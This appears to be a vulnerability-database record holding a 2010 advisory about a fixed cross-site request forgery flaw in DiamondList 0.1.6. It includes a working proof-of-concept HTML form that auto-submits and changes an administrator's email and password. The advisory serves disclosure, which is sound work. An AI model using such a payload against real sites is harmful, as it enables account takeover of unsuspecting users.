DATABASE RESOURCES PRICING ABOUT US

{"lastseen": "2020-04-01T19:04:12", "references": [], "description": "\nDiamondList 0.1.6 - Cross-Site Request Forgery", "edition": 1, "reporter": "High-Tech Bridge SA", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2010-08-05T00:00:00", "title": "DiamondList 0.1.6 - Cross-Site Request Forgery", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-08-05T00:00:00", "id": "EXPLOITPACK:C2951D804990427C06D322BFBF027B82", "href": "", "viewCount": 3, "sourceData": "Vulnerability ID: HTB22517\nReference: http://www.htbridge.ch/advisory/xsrf_csrf_in_diamondlist.html\nProduct: DiamondList\nVendor: Hulihan Applications ( http://hulihanapplications.com/projects/diamondlist )\nVulnerable Version: 0.1.6 and Probably Prior Versions\nVendor Notification: 22 July 2010\nVulnerability Type: CSRF (Cross-Site Request Forgery)\nStatus: Fixed by Vendor\nRisk level: Low\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\n\nVulnerability Details:\nThe vulnerability exists due to failure in the \"user/main/update_user\" script to properly verify the source of HTTP request.\n\nSuccessful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\n\nAttacker can use browser to exploit this vulnerability. The following PoC is available:\n\n<form action=\"http://host/user/main/update_user/1\" method=\"post\" name=\"main\" >\n\n<input type=\"hidden\" name=\"user[email]\" value=\"admin (at) example (dot) com [email concealed]\" />\n<input type=\"hidden\" name=\"user[first_name]\" value=\"First Name\" />\n<input type=\"hidden\" name=\"user[last_name]\" value=\"Last Name\" />\n<input type=\"hidden\" name=\"user[password]\" value=\"1234\" />\n<input type=\"hidden\" name=\"user[password_confirmation]\" value=\"1234\" />\n<input type=\"hidden\" name=\"commit\" value=\"Update\" />\n</form>\n<script>\ndocument.main.submit();\n</script>\n\nSolution: Upgrade to the most recent version", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645640707, "score": 1659818015}, "_internal": {"score_hash": "cddcbaf081f2df6cf3a23fad43606860"}}

{}